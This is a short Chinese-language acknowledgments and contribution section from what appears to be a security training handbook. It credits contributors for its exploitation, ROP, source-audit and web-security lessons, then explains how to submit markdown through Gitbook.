• Andrew Ruef 提供了倡议和PPT。

• Evan Jensen 开发和优化了几乎有所的课程

• Nick Anderson 校对了所有课程并进行了许多改进

• Alex Sotirov 贡献了ROP课程并提供了反馈意见

• Jay Little 重新审阅了二进制漏洞利用部分的内容

• Brandon Edwards 贡献了源码审计课程和newspaper应用

• Marcin W 和Gotham Digital Science 贡献了Web安全课程

• Dino Dai Zovi 贡献了漏洞利用课程的介绍

​如果你对这样的课程感兴趣，请参考NYU Poly。他们专注于网络安全且经常通过他们的Hacker in Residence活动与我们合作。

参与进来

如果你想参与该手册的编写，只需简单地将你新的markdown提交到master分支即可，我们可以从那里获取到提交。Gitbook有一个出色的编辑器用来帮助你预览更改。我们一直在找寻新或精妙的内容，所以请给我们提供建议！

Gitbook的使用